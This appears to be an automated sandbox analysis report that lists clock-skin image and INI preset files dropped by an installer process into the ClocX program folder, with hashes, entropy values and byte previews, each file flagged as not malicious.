SHA-512:	C8D39CB4CB8E5A55D00E1652A0889E0FB3B75C9CFBCDBE2BC0DE95425BF9DB7E07111654E2FC3F0CA8D295B70233730D2F94DDBD83AE6F3A5CECB411D4178827
Malicious:	false
Preview:	.PNG........IHDR..............?.R....tEXtCreation Time......85>`y.....tIME.....*..S.D....pHYs.........B.4.....PLTE...i..S...a......".....P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E ....tRNS........S...FIDATx.c`.t........e..H.0....V`.......@`.+......8.4..X._v.-..`.v.;.....W.#....k....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\minutehand-7.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 260 x 9, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	994
Entropy (8bit):	2.0676937312492822
Encrypted:	false
SSDEEP:	6:6v/lhPkgm0CcgCMkuldXQPMnP8wE3BEdBNmoSaRRClY4bbGVic1xu67z3p:6v/7sCEwmP8RBEdBNmoRP4bb7H67F
MD5:	938CC637343645DC9C62B076D5136EEA
SHA1:	AA97737CE6ED4A6467565FFAE188B8065E3584DC
SHA-256:	8206494360928E9B8567FB00B05249B2E484CBFFE61297CE3AAB13C19319F657
SHA-512:	7A118C93CAC330AF2DEB065F4A19E55884C4099B9963DCE25F8244A9C5FA490E3BE75F16FBFD298E68815C1D0EC4ABB6171C965A213AE5252CD5EFC5DBFC7D60
Malicious:	false
Preview:	.PNG........IHDR..............?.R....tEXtCreation Time......85>`y.....tIME.....*.Q.#C....pHYs.........B.4.....PLTE...i..S...a......".....P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E ....tRNS........S...CIDATx.c`.t....d.@{..0....@`.?.t..6.....t...c@.hJ.....F......@......."..!......IEND.B`.

C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\secondhand-7.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 258 x 5, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	966
Entropy (8bit):	1.8498608372980492
Encrypted:	false
SSDEEP:	6:6v/lhPk51llGMkuldXgknPMnP8wE4cyOP5Rt+D/6SaRRClMUspNvsOzQp:6v/7Q+EQGmP8ieRt8/6jRjUspqOza
MD5:	903639FD237D7A7AD546C610AC3E5B0C
SHA1:	E387CEC4B6524E228ADDE937FF7A73A10E4D5C7E
SHA-256:	AC322A5C1AB93B1C7C6311EBFBADEBB5FED8D4745032C024FDD4520D040C55B6
SHA-512:	48C4BD0345893432ECA0745A1DA8D9B023BA1E385C37D6157A24FC6B98EBE4A343EA8508902C4B9A3D626982E3D0AB5102C1DA363ACFF16E710FCDCC9E75F0E7
Malicious:	false
Preview:	.PNG........IHDR................n....tEXtCreation Time......85>`y.....tIME.....+.\.NM....pHYs.........B.4.....PLTE...i..SSS..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f....tRNS........S...'IDATx.c`..a.................h*`.tA@.... .W4U.Y....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\Earth2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 99 x 98, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	23596
Entropy (8bit):	7.977189008715547
Encrypted:	false
SSDEEP:	384:fG3wnDvFur/1BzxGeMzVDrTYk4cOLS28OG55+cqkem85Y2YErO5nEOmYKyhMAiw1:xnpu5DczdY1cOHmed9y5H7JUGf
MD5:	3D11A2F8562DD07A4D1C0BCCAD601535
SHA1:	0F123DE33890FD36A1E11A7B8E4F15CA68BDADCC
SHA-256:	1A93F6ED5578452B808BDADF9A19C889D262C2264C98A204AEC82CFD35EDA4A7
SHA-512:	C8856EB5482EBEB1D4F27256DED07995EA4822B759622FA9BAE5474DB6660D746C03AAC48708D8A3A90D2204E38553310BD21FF07AD841664AFA7DF3F6E6511F
Malicious:	false
Preview:	.PNG........IHDR...c...b.....Dgm0....bKGD..............pHYs............... .IDATx...gP....y.o.cc{"f;bcg&z......[.T.[..T^%.J^...L.@ZH..iH...x...a$..B..C. [.J.}.mz..3.=.3.c^."2"........s...........g...<...O>.7k.....M.}._.......<......p.j kk.X^>.......[22?#^.+.....w......#...0..y.8....S..O8>y...B.w/....y3...c\.............G8.~3...ay....VW..x1....X].`y...]...o.=g....................a<x...z0kk.XY....a.\8........9?..cq.o...........?r.>g.?cv....O..k.P^.....<x...A....>...++...~...1v...t. .....'..........>.v.. .........$-.7..\|LY.g44\|....r..f..k~..V.'\|....?.Fh.O8y.0O.Dp.n.{C..j.......!b.O......K.c.F...bSc..Iu.awgas..?$...N.!..#.d...^.2YD.2...{b...T.......m.....9.....?...!...\U.-..}.........?O.Dp.v....lA..~LR....?..DF..T!.....).[XE~i=E.M.W..l......z.'..m.j..._..[..[Lzv.iY>..E...avxH2(...&6.wX....h;MM.0?...........44~G`.G..._.I..0.;w.[&'......Q\.............+...Q..dd..]TMIu+.M=..Q..Cy].%...S^.Ay]......1..m..LeC..u...SR......z..Ud.......#5=.d...,.Q..dd....

C:\Program Files (x86)\ClocX\Presets\GroenneKugler.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.906092571887757
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5MoaKLuaPTO2u1DHkp8wdGj8xi85sjibtYQTd9iBY2jabOtWuc:BTqylRMofiiNdGjWCUtjTTiBY2Gb+Tc
MD5:	6299257E666FF7E94C35E5C06CF2C369
SHA1:	283C54F59495A84734889776ED6F47ED5AB6A98E
SHA-256:	DBE467C95B421C4E0B99BF65A99FEDA9DD8C86687FF10889D3C1DFA6DBEF3E3B
SHA-512:	942802E9022565303ED072DDE09CDC564870DF7FADCEA4156DF47ABA9F38D99E5E73972BEC64CFC68427B492862BBB5CADE78F41D80274DFAC0C684AFE708113
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=0..DateColor=0x00FF00..DateFont=Arial..DateFontSize=30..DateCenterX=1000..DateCenterY=25......HourColor=0x0000FF ;color of hour hand..HourLength=160 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=10 ;width of hour hand....MinuteColor=0x0000FF ;color of minute hand..MinuteLength=210 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=10 ;width of minute hand....SecondColor=0x00FF00 ;color of second hand..SecondLength=250 ;length of second hand..SecondLap=10 ;ove

C:\Program Files (x86)\ClocX\Presets\GroenneKugler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 1600 x 900, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	17954
Entropy (8bit):	7.7331748694752225
Encrypted:	false
SSDEEP:	384:mp5XLNVMnsvqqyUuXWEDgdYpUN8y5t0awON+:m3LEXDWEO600sN+
MD5:	B32A0C1C5D6FFEDD2AF545F0C774CF67
SHA1:	A16B334B7B7A19B2F04842C2D586A7D14E78385B
SHA-256:	858D8FF1F4F91C37D2034D3E39FD1B7B9222F63199A92F133766D0C8D03AFF41
SHA-512:	F6365D1353D59B160CCF3719B7CA519A3D5039EC027AFECAFF3BFE5E4F4E9B1303789883B82BA54209C5218E4A99E5CAF32BCFAE6B75D9765178F5778E4D4036
Malicious:	false
Preview:	.PNG........IHDR...@................tIME..............pHYs.........B.4.....PLTE......."..$..)..,..0..6..:..=..A..E..H..M..O..P..R..U..W..X..Z..\..^..`..b..d..f..g..i..l..n..q..s..v..z..}..~............................... .. ..!.."..#..$..$..&..'..(..)..)..+..,..,..-......../..1..4..8..9..;..<..=..@..E..G..H..I..M..N. P."Q.$R.&V.)T.(Z./[.1].3^.6`.7b.9e.=f.>g.Ai.Ck.El.Fn.Ho.Ko.Iq.Mr.Ns.Pv.Rw.Sw.Ux.Vz.X{.Z}.\~.]..`..b..d..e..g..i..l..m..n..o..o..q..p..s..u..v..x..{..{..\|..~.....................................................................................................................................................................................................................................................................7......tRNS...........................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\GuldKugler.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.906092571887757
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5MoaKLuaPTO2u1DHkp8wdGj8xi85sjibtYQTd9iBY2jabOtWuc:BTqylRMofiiNdGjWCUtjTTiBY2Gb+Tc
MD5:	6299257E666FF7E94C35E5C06CF2C369
SHA1:	283C54F59495A84734889776ED6F47ED5AB6A98E
SHA-256:	DBE467C95B421C4E0B99BF65A99FEDA9DD8C86687FF10889D3C1DFA6DBEF3E3B
SHA-512:	942802E9022565303ED072DDE09CDC564870DF7FADCEA4156DF47ABA9F38D99E5E73972BEC64CFC68427B492862BBB5CADE78F41D80274DFAC0C684AFE708113
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=0..DateColor=0x00FF00..DateFont=Arial..DateFontSize=30..DateCenterX=1000..DateCenterY=25......HourColor=0x0000FF ;color of hour hand..HourLength=160 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=10 ;width of hour hand....MinuteColor=0x0000FF ;color of minute hand..MinuteLength=210 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=10 ;width of minute hand....SecondColor=0x00FF00 ;color of second hand..SecondLength=250 ;length of second hand..SecondLap=10 ;ove

C:\Program Files (x86)\ClocX\Presets\GuldKugler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 1600 x 900, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	18084
Entropy (8bit):	7.75211321666826
Encrypted:	false
SSDEEP:	384:dMfoGG4iyzLXP0ZCh1zDXZ8L5cevao4+JSIrJUjTTSs6O2M:MoGGTuXsZw1DXZ8LlSZsr6TRHL
MD5:	FE01D57C5DCEE76563AB98CC0C8191CA
SHA1:	61E51410FE6E6E09D8437A80746C2640A31E30B4
SHA-256:	9814CBDBE2037432E1ACD08483A1D09592B7286B10ABED744E7F27E9E53249D6
SHA-512:	55EB4FA8786980D764A006358990BEE376A6AA828EF649BCD5EFB37B40120C45C04E549DAE28010B4D6CDF6997A75887AF6FE06401EB2EFC0798ADDE4B50E34D
Malicious:	false
Preview:	.PNG........IHDR...@................tIME.....7..&......pHYs.........B.4.....PLTE7,.;0.>2.@4.E7.F8.H:.K<.N?.QA.SC.TD.VE.XG.YH.[I.\J.^L.aN.cP.dQ.fR.iT.jU.lW.nX.q[.r\ t] u^!w`!ya!zb"\|d".f#.g$.i$.j$.l%.m&.o&.p'.q'.s'.t(.u(.v).x).y.z.\|*.~+..,..,..-..-..-......../../..0..0..0..1..1..2..2..3..3..4..4..5..5.6.6.7.7.8.:.<.?.@.B.C.E.G.H.M.N.P.R.U.V.X.Y.[.].^.a.c.d.f.h.k.l.n.o.q.s.t.v..w..y..z..\|..~.................................................................................................................................................................................................................................................................................................................................................................. m#....tRNS...........................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Holzuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 160 x 153, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76563
Entropy (8bit):	7.981093231474991
Encrypted:	false
SSDEEP:	1536:a0YzZWfFT+/3XsqBkWMkizXqi1J4Py2huSyPYLY4l6ov4L9RI251yP:aLWt+/3XsY/yzaKJ4Mx4lhS9RDK
MD5:	3A3667D7B67B89C0EA9061711B3C6C6C
SHA1:	D4EF1011E817D469C6079C066104FA12CD03D669
SHA-256:	28FD079455D8B533C4B3B4B217DA82E9097F199EDB3435D9D787B5E42CA342FC
SHA-512:	39FF76E279C8A641CABDC71891D26B31C56ED0F80F68AEDF0273E22C454F36339117316E9AA776CFAD7CAF9A5664406A77C4B3AFCA44C456950EF1DE127A7C65
Malicious:	false
Preview:	.PNG........IHDR...............1H....pHYs...:...:.d.W.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...IDATx....O.....6.uX.L.....T.P.#u.!(.......i.)......i.J1W3.e..Z....w...}.....}Jy.....J9.T9..e..(.D.\|.,..H8w...'DFp-...Q......(...K.P.J..P.-..,..E\|..X.c)..K....P.!.L.....W..8.[Q.M.5.B...5.m...Lj5r..t..YX.U.4i.S..)..)..U...i-..U...Cwu.CM%.;.w.!.kd.]..e..T..V..f!h..h1.....&....g.....jA.[Y.hf.....6^x.y;.b.....!..A...0v.}a.....K!..cl{......?b'0..\.?.+.o>...<.6..o...z..k...F..<...a.SC....2.eor..S.b...r8?.....Q.....<\|..`[.......W^...N6.l...Ys...m.i.....U"4.....YY.0..e.Iw..N.>K....Ck9..2B.j.o.2Rn`.D..c.f>n}........2d.+..E...W...Q%.+..M..3SF]N....W....0@.?I.P.n...J]Kj^..Fi..&..D.....@.". ^..7...ts3..U+/.R?Y..m.MO.....l.l...$.&%97(..D..E.......+..]E...Xp.K.].H.LA.5$)I.KOB...Z*..a6.UR.)..[".9....S]$BS.M.4.UA:..<...hU....5.a.S`./.Q_A.@W....r:.dXT2!..^WN.Z....k.R...r...x^...hU1lP3gk$...[G..B.c...MO.g......%..e..X..5...>3q_.k..D.}...z..

C:\Program Files (x86)\ClocX\Presets\Holzwanduhr.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 128 x 130 x 24, resolution 2834 x 2834 px/m, cbSize 49976, bits offset 54
Category:	dropped
Size (bytes):	49976
Entropy (8bit):	7.092155868494483
Encrypted:	false
SSDEEP:	768:ab87dRTe9524Xb8CR1ShryVMZAFoNYoEnT2Z2++7ClagdgXfgc7InbO:aIcEyVMZAedS2ZJqClwfgc0bO
MD5:	E119CD24C7FD2C54B082E7B27F5E11E4
SHA1:	A78344B1A624CF58B2B6051F9864C966C78375BB
SHA-256:	7AA8F3DECB9E9B660682CAC31A0A77F92F9F47FA55DE60FC259132FD4246135F
SHA-512:	E68052BD60E2973930A59029D4E39491FB277AE27C3649288FA99CD9375F3C70E317DCBF5E0824E4F4D5E50157B6F3FB3294C07CCE0B5BABB7C6CC98A0F5A3B2
Malicious:	false
Preview:	BM8.......6...(......................................."................... ..$..$..%..% .'..("., .+..)..'..)..)..(".% +!.'..% .'..'..(..(..'..'..'..&..#..%..%.."..#..'..+..-..,../..0..1!"5 3..6#!>'%B&$A&%A''C&%A&$@&&A%'B."=."=&(C((?&$7'%8.!6"'=..6..5!!5! 1..-! 0&'8..3.$7 $6.$3. 0. /!#2. ...!"0""/ .+ .+# ,!...&..$..%..&..%..&(#-(#-.)4/5-)4/+6,6('1##, .( .)"!,#", ".%"-%!,!.(..'#!)&#- .+ .-! , . .)".(%.($.'(.,#-.&0/'0-%.1,/OKM............#..$.$#.$$!$$ #$."#."#."".#".%".&#.'#.(#.) .& .%.."!.$".%..$.."..$..$.."..#..#..%..'..'..%..%..'..(....+..,..+........+..,..0 .3!.4$"7'%;'%;&%:(';'';%';&(<&'<&';&';'(8$&6"#6."5."4.!4!!6##7##6$$7"#8"$9#$8%$7%$6%$6##4""1!!1! 0..+..+..,..,.., ...(..%.."..!..#..(#!++(3+'2)&1((2)'2)(2''2!$."#-"".!!-! . ..!!/# 0#!.#"."#..!+..(..'..(..&..&..&!.%#.&$.&$.&,$.62:?<AB@F56:49=.........$..(."&.&%.'&#%&""&!"'"%'!%& &$.&$.'$.($.'#.(".'".& .# .$".& .&..% .'!.)..(....+...!./!./$#5%%6''7((8():*:():('8&&6%$5##4""3##3! 3..2..1..2..3..3..2..0..0..0../.....-.

C:\Program Files (x86)\ClocX\Presets\IvyLace.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1542
Entropy (8bit):	4.878600306111023
Encrypted:	false
SSDEEP:	24:BEZrGXE5lrABRhB0aKEszdeTOs010BJGkpUdGIo8dip4UGibQ0Wd9i8xLnQI:BkqylUhB0fXjAf6dGJP4AQJTi8xLQI
MD5:	3D708D8F639F76D859E665EF694A62EF
SHA1:	0B1CC310F0033F40D0893BB5A13E6B69E6F2987F
SHA-256:	7BD5BAAF5212EEFAD806866581EEC7CEF31BCA8D1FDB1189F246F3CE6BF0CBFE
SHA-512:	47998441D8C308402C30857C0493C75EC0E5F7CE122A724426DCD35E126EB492F84C0740F663AA41CC33DA80008A5442B93F78CB6A99BA0ECB0DF0471F3F12C2
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x000000.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font..AMPMCenterX=92..AMPMCenterY=112......DisableDate=0..DateColor=0x000000..DateFont=Arial..DateFontSize=10..DateCenterX=90..DateCenterY=76......HourColor=0x011AFD ;color of hour hand..HourLength=29 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x011AFD ;color of minute hand..MinuteLength=40 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x000000 ;color of second hand..SecondLength=47 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\IvyLace.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 193 x 322, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	88214
Entropy (8bit):	7.99675772005271
Encrypted:	true
SSDEEP:	1536:tEYNBJ0JbTvglRPMu2FUqo5pnf6fAXk+C35bv7ty64zIW8X3j0R8zIoAJ:tTNBqPIliu2+rfAr+C35bvZypbY3YSB0
MD5:	DF9960BD75494BE3C8AA6953BC4B869C
SHA1:	1B8E3720D85A3583443ECA58E2827F0BA5E75B0C
SHA-256:	8A265F137F9BD4C9BA7BCA815DE1088E1F95C093A25901350B7CD0B4B14FDE78
SHA-512:	8B939210B7A77616C06E50296B21A3501570748DB2BEFCD6FD05615FB5EFE0CE397B76C9D459C858FB328FF90FC6639CFB9A1B8D782E4925AF1568D3188265FA
Malicious:	false
Preview:	.PNG........IHDR.......B.....H..^....tIME.....$8L.......pHYs.........n.u>....gAMA......a...X%IDATx..}...U...9wO.y`.9.$QI...5..3. Q...k._.uu..fE.P....00.L....}.snU.4,*....}..u...t..'.S....vr;...Nn'......vr;...Nn'........O_...M.7~.&......N...oG.v.:...9...UGL.G..$@~.v..............6455a..;...............9B....;L&..n7...`...t:...%.....1.4BP..m......'.q..I....cBo.c..5...={.`..$.a......F..Q..B.......D...`0.P[. ..#..A....l1.q#..f.....h.=:u...x$.>... G..IP..v......._>...7...k.HD@G...tZ.sg...H....Euu5L....l..$........././Z1........>x.[...r.>..CUhhh@ee%..:D... .....g~~..u.&..p..x`0z.A.t.$ . P6M..y....3f..\|...&)t..=..:t..;.G..9..3....I...e....f.....$.b..p8..\|<.[RR.z..^.za......oFu.....&.....[.....PUU.f._..d.Ik.{w......@..M;.I@.$.......k.....{.n...-.Fbb.i.........UsR..u.....>....=Z.#;;..:..5k...__H.j.".b.-.....u...`"?@..(........MsG....k..L.^..../.....J...z.WQ.$...1`..<......0 Nn..6M.Y.Zh.n..ZQT.G.....0.tR;...3g...O.1..P..h...Fg.]i..'.#....

C:\Program Files (x86)\ClocX\Presets\Jagua3rClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 113 x 113 x 24, resolution 2834 x 2834 px/m, cbSize 38476, bits offset 54
Category:	dropped
Size (bytes):	38476
Entropy (8bit):	5.853923355401225
Encrypted:	false
SSDEEP:	768:y4ktG2kfqzqNul4stj9IkOA/z7kOBSi3TyA+mjg/lhqt4mI6p:ex9xSO44
MD5:	0511D5EDD48E385FE14E0E0A5AD3843C
SHA1:	C742845EC023E86FE7B1CE77733FD5111C286027
SHA-256:	9B5CDA4BCF5F1DE67D41E96FDE3DA74A7355B31C8C30A9867079E5B515774C05
SHA-512:	A8635F77EBDA4E739A922ABFF623B5D4B82F43F5F1358A8E9749FD41B53F855877EFB37B04C1A979E70BE92E85016912D1481D227E4ECE23E2D3FE9A6C7DBB1D
Malicious:	false
Preview:	BML.......6...(...q...q...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~~~}}}\|\|\|}}}................................................................................................................................................................................................................................................................................................................~~~xxxtttqqqnnnooonnnooopppqqqtttwwwwwwzzz}}}}}}~~~...................................................................................

C:\Program Files (x86)\ClocX\Presets\Jaguar.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 119 x 120 x 24, resolution 2834 x 2834 px/m, cbSize 43256, bits offset 54
Category:	dropped
Size (bytes):	43256
Entropy (8bit):	4.430342366223317
Encrypted:	false
SSDEEP:	384:kZz8J05teDCm3J1MREBqXFlKbBfqJ+/VAImPWFOQ:cOZHkuqVlKBd0CR
MD5:	41C592514DFA1093A831102815AAD068
SHA1:	20474FCEAD8EDA8247270B171FC0CCD6B1EDBAEC
SHA-256:	86652BF37435C6E524E5DC73056F9A22F08ACFB8E427372E51D4C18FED4F2053
SHA-512:	CD715B96F7F895F5546E2EA80EF9E54643FEB75ACDBE723F6F4246032DEBB7487D338B548FD71041BF4416548AEDCDFA7AED7977EBE245752525130702899DF8
Malicious:	false
Preview:	BM........6...(...w...x.....................................................................................................................................................................................\|\|\|vvvrrrnnnkkkeee`___^^_^^_^^_^^_^^_^^dcckkknnnqqquuuzzz................................................................................................................................................................................................................................................................................................}}}tttlll]\\PNM.d..[..<_.:Q.(7..#........4 Qp)k.A..=..:..6..3..0../..!q.OLI][Zkkkrrrzzz........................................................................................................................................................................................................................................................................wwwlllWUT.5P.Cb.Wy.Su.;^.4W.?[*G\.-9..!..........#:/\{B..F..>..;..8..:..0{.,u.!k..h.#o..i..a."`.TPOj

C:\Program Files (x86)\ClocX\Presets\Jaguar2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	27059
Entropy (8bit):	7.870527552757156
Encrypted:	false
SSDEEP:	384:5hLqpEkpEyxcmTzRgctHZTjeZz0V0LFLXxnQISR+ApHwsXRcyXnEWjsExibdCaVO:vuSIEBajH4hBQtJpHwsXT0zpdCao
MD5:	A12A30AD1D5DF1AA37A800872F645267
SHA1:	6B2235DFFB9C8AC6A3D86E852A00D46D623F6843
SHA-256:	FDE433ABA0FDE6691638D7AF029EF95561980183697595097D23BEED55263BC8
SHA-512:	927E205DE83C8A795C2F4C87060386DA15A36B2F3F72EF621AC7BA9A641B1B72F4ADCE839B8C9619901B626C44B0C930C7C3DB475F881EBDF43AAB445F718D8A
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..i)IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@...DO.D.1j.3...2~..........6".....8\....Y..y..$......DD.....E.x9$D.....89..X..Y~...............7.>_.}...7?.......~....(.....@ZZ..H..i..x..).(.J..rK2......OEVf.Y.N.^..^.n.vf.N6&fv&f.&6...........?.?F..??......./...xv...{...y..............<z......<.=...@.......""!%....,.E......y.T..9T5E....23..................X.q.....I&.H..e`.........../..g.p.!../...........N.."\|..dDx.K.r^...~....g...x..wC5....J..j.R..z.......?.\|1.......<l....y.TD....x..0.3(';.3.70.y..1.3..=..?....+......tFfF.f6F.F`2`d.....?.._.n.z.p..-.+w.3<....;.....$.......2.....~i...Y.._......G.<................!....}ZTZ.?. ..j.....'.hf.E"..".l&.J.....O.x...r.......AO..z..:B....../... BUdTM.M.B.($..c..E...A..8..g.Ga..q.bI.,..+.#<...$!'...z8...7D.G.4P...5.P..f....5NBq.uv..b.....h<.2.R^H.K.b.O.......i.......Xi.&.8..+.HL,....

C:\Program Files (x86)\ClocX\Presets\Jaguar2Clock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 112 x 113 x 24, resolution 2834 x 2834 px/m, cbSize 38024, bits offset 54
Category:	dropped
Size (bytes):	38024
Entropy (8bit):	4.444331785396521
Encrypted:	false
SSDEEP:	384:mhipaBfLvA0hW8KqcE/iq4UREimrRPwavK:KipG/W8Jc7q4Uaif
MD5:	1FB082E898C2DCF91F26D998690B30A5
SHA1:	87A4DC0D6F778717BB9AF2E2F2B7853CD1CEA6F9
SHA-256:	7E1947AA387E9E85B3E8D83EB850DD26C47C301B4A7F9CCBC098D0C902996F92
SHA-512:	FD929B122F39E74C79F3CD61CBAFA865618B2FA4FDED1700A096FA4DA18AAE9408BCDE9631104E855545BB63CA44254A2B22ACC19C4F8721CFF00FF8F521A59D
Malicious:	false
Preview:	BM........6...(...p...q...........................................................................................................................................................................................~..\|\|~yyzyy{xxzwxzyyzz\|{~.~.........................................................................................................................................................................................................................................................................................................w}.ntzejo[_cUX[RTVQQSRRTRRUPPTPQSRVUVZXbffosu{...................................................................................................................................................................................................................................................................................z..v~.s{.ox.fpyXbjIRY=EJ4:>157.241340030/3016.250767??IRU[cjks}u~.{..............................................................................

C:\Program Files (x86)\ClocX\Presets\JaguarClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	23118
Entropy (8bit):	7.947051271511001
Encrypted:	false
SSDEEP:	384:5Ahl3Fn0P77pTlP0pz5R1RPHwYNUSEAI9wiF/6fXwgQScBeWyW64Z0Y1HKlwJALt:e7WBTpkTvrzEAI9wdvXzgZtEGGL40v0U
MD5:	C257F6DCF2A842219E24F43BD47F09EE
SHA1:	999662C17D219CC7A6675A3EF0868104D13479B2
SHA-256:	D9C00401BF038C437165B16271C0594FA63F0C26355B348EBF126CB322DD8BF2
SHA-512:	B08EDA45A957706E47959DB5C429FDA68E9E1073FEF50251D0D344FA7A12C3142B9234F79FA079C95B0A4DE7818D9E78179EB5A6E49A8A6FDBE8D775CE6F3BF1
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..Y.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@...$....0KII1...0111...2qqq....../_..111.gee5......8...$%%.....899.uuu...(###.../.....q.....i. f....P....~add.....@....._........7..._.1....K..Hb........g.........J...i.#[...C...E....r\|@.d.H?...@.h......?...=..&..@\|.XJ.x..+gg.....C....!............<...:.\)..."''g...J..R.bNX..#.n...H....1@..\......+++.....C.}..w.U.9 >........MMM........8.........%.N..B........h......x..=N&A..Z.A...@j..."...:$.[A"B...Z.-.....a.L.czb.)....o..Nw....{.?...@...."...n....9...-....mllL.......,..C..a....A...............?~..l.1...p=....H...60.={.....dpssc...C..`4H.(..0.....v..<.,......ooop.n...X=....@.&.@#...3..........K___.X................D...C...3\.v...@..JKK.xxx..a...w.../fx..-...*.+W..^.............341@.......@...`"=....@.....s'#.......e.E<+.......#0...[..:V..p....A...dX.5.`40.......

C:\Program Files (x86)\ClocX\Presets\Kirchenuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 142 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	27150
Entropy (8bit):	7.965413194830163
Encrypted:	false
SSDEEP:	384:WHpNa5lfTIYOR0MEvwGYHyEmHH497tvTDo8s7mTHX3cTLmkZR37B4jc23wXDpXGM:6OXgyE1hXod7mjcTLmQ74c2gXVXGwgns
MD5:	4AF2EC664E52978F64F505D6C2AB29B3
SHA1:	288C0683413F7E7AD06A868C4DA687C073D3A208
SHA-256:	D1D9C71B77F881609E96467DF3FADE83D734030101943064D201201EBE3EBBBB
SHA-512:	87CE065E304EA617FC2953212E74786D146315EBBCAE9456B353296613999EB82E24201AB52157C41A40AD1045FBAFD584002EBC3375265AD6DD5ADBFCFE8A3F
Malicious:	false
